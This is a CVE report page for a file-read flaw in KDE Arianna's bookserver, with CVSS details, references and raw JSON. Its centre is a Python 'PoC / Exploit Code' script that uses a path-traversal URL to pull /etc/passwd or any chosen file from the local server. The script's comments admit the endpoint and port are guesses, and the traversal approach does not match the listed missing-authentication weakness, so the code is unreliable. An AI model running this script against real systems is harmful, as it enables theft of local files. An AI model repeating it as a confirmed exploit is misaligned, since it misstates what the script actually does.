Security Vulnerability Report
CVE-2026-42095, CVSS base score 4.0 (MEDIUM)

Published: 2026-04-24 15:16:48
Last Modified: 2026-04-24 17:55:55

Description

bookserver in KDE Arianna before 26.04.1 allows attackers to read files over a socket connection by guessing a URL.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

KDE Arianna < 26.04.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-42095 PoC: KDE Arianna bookserver information disclosure
# This script attempts to read local files by guessing the URL path on the local socket.


def exploit(target_host, target_port, file_path):
    # Construct the malicious URL by guessing the path
    # Note: The actual endpoint structure depends on the specific bookserver implementation
    # Commonly it might look like http://localhost:port/files/../../../etc/passwd
    url = f"http://{target_host}:{target_port}/files/..{file_path}"
    try:
        print(f"[+] Attempting to retrieve: {file_path}")
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print("[+] Success! File content retrieved:")
            print(response.text)
        else:
            print(f"[-] Failed. Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    # Default target based on local vulnerability context
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 8080  # Placeholder, actual port needs to be identified
    # Example file to read
    FILE_TO_READ = "/etc/passwd"
    if len(sys.argv) > 1:
        FILE_TO_READ = sys.argv[1]
    exploit(TARGET_HOST, TARGET_PORT, FILE_TO_READ)
```

References

https://github.com/KDE/arianna/tags
https://invent.kde.org/graphics/arianna/-/commit/3cd56fce103ab62887c5592827d78a1197cd926a
https://invent.kde.org/graphics/arianna/-/commit/485851d25de279a9d2711d3780443530e9851300
https://kde.org/info/security/advisory-20260424-1.txt

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42095",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-24T15:16:48.273",
    "lastModified": "2026-04-24T17:55:55.317",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "bookserver in KDE Arianna before 26.04.1 allows attackers to read files over a socket connection by guessing a URL."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-306"}]
      }
    ],
    "references": [
      {"url": "https://github.com/KDE/arianna/tags", "source": "[email protected]"},
      {"url": "https://invent.kde.org/graphics/arianna/-/commit/3cd56fce103ab62887c5592827d78a1197cd926a", "source": "[email protected]"},
      {"url": "https://invent.kde.org/graphics/arianna/-/commit/485851d25de279a9d2711d3780443530e9851300", "source": "[email protected]"},
      {"url": "https://kde.org/info/security/advisory-20260424-1.txt", "source": "[email protected]"}
    ]
  }
}
```